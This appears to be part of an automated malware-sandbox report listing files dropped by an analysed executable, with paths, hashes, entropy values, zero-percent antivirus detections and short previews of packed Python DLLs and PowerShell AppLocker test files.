                                                                                                                                                                                                                                                                  SHA-512:77DB2FE6433E6A80042A091F86689186B877E28039A6AEAA8B2B7D67C8056372D04A1A8AFDB9FE92CFAEA30680E8AFEB6B597D2ECF2D97E5D3B693605B392997
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gsX.#.6.#.6.#.6.*j../.6.3.7.!.6.3.5.'.6.3.2.+.6.3.3...6.hj7. .6.#.7...6.k.>.".6.k.6.".6.k..".6.k.4.".6.Rich#.6.........................PE..d....g.f.........." ...).....0......P.....................................................`..............................................#..........................................................................`...@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI33962\unicodedata.pyd

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\X9g8L63QGs.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):302872
                                                                                                                                                                                                                                                                  Entropy (8bit):7.987647920176007
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:WL4g17Ziz1gCtki0R7KjUAkDvN/mMHvmCMztFY3oudYnc3nSX7:WL4Q7Qz1pknmIhxsQKcXSr
                                                                                                                                                                                                                                                                  MD5:382CD9FF41CC49DDC867B5FF23EF4947
                                                                                                                                                                                                                                                                  SHA1:7E8EF1E8EAAE696AEA56E53B2FB073D329CCD9D6
                                                                                                                                                                                                                                                                  SHA-256:8915462BC034088DB6FDB32A9B3E3FCFE5343D64649499F66FFB8ADA4D0AD5F2
                                                                                                                                                                                                                                                                  SHA-512:4E911B5FB8D460BFE5CB09EAB74F67C0F4B5F23A693D1FF442379F49A97DA8FED65067EB80A8DBEEDB6FEEBC45F0E3B03958BD920D582FFB18C13C1F8C7B4FC4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................(.....(.....(.....(.....)................).....).....)x....)....Rich..........................PE..d....g.f.........." ...).`....... ..@....0................................................`.............................................X....................@......................................................@...@...........................................UPX0..... ..............................UPX1.....`...0...^..................@....rsrc................b..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0v4jbhj5.jll.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1v2wowcy.t4s.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20gyxysj.fpu.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ylnadic.3h5.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4o1v4sb5.fhr.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4voxkqhi.ryp.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52ldxs1r.qin.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5i2yazpr.q3i.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bddzlope.gsa.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cn13fu4e.pbz.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cz5y25uo.p3t.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_di2m5jdt.2do.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dps424wf.xnl.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f4fctfdn.ze3.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gavszs4j.th5.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_glvyt0g5.nmp.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2qioj21.jpc.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p0covdcp.2hy.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quuh2opv.vq2.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqqi5rfi.qpe.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

